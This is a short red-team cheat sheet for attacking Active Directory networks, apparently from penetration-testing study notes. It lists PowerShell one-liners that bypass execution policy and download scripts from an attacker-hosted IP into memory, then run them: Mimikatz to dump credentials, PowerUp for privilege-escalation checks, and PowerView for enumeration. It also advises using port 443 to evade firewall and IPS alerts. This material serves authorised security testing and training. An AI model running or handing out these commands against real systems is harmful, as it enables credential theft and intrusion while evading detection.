Important Scripts & Links

These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is a major overlap with the previous section, however the major difference here is that this is simply a list of scripts along with their usage and commands (if required). On the other hand, the previous section is based out of need/requirement and the best script/command that can be useful.

The heading to the tool gives a gist of its use and the section contains 2 parts,

• Link to download the script

• Command to download the script locally and execute it from memory

I have following the method of downloading the scripts to a local repo and then using them in the powershell command to download & execute since the targetted machines may not have internet.

I have also used 443 in the http link since I use either 80/443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts.

Scripts

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.119.208:443/PowerUp.ps1’);Invoke-AllChecks”

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/powerview.ps1')"

Links

WADComs

OSCP-2022/cheatsheet-active-directory.md at main · brianlam38/OSCP-2022GitHub

https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce